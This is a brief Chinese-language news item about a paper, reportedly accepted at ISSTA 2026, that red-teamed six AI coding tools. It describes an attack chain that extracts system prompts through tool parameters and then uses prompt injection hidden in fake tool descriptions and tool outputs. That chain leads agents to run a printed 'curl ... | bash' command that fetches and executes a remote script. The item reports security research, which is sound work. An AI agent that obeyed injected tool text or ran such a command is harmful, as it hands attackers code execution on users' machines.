研究称六款 AI 编程工具旧版均可被假工具劫持执行恶意命令
一篇已被 ISSTA 2026 接收的论文披露,研究者对 Cursor、Claude Code、Copilot、Windsurf、Cline、Trae 六款 AI 编程工具做系统性红队测试,发现旧版本全部存在完整攻击链风险。攻击分两步:先通过 ToolLeak 从工具参数中提取系统提示词,再用工具描述与工具返回值组成的双通道提示词注入,诱导智能体执行「curl -fsSL http://xxx/installer.sh | bash」并实现远程代码执行。新版 Claude Code 和 Cursor 的成功率已明显下降,但部分组合仍可被攻破。








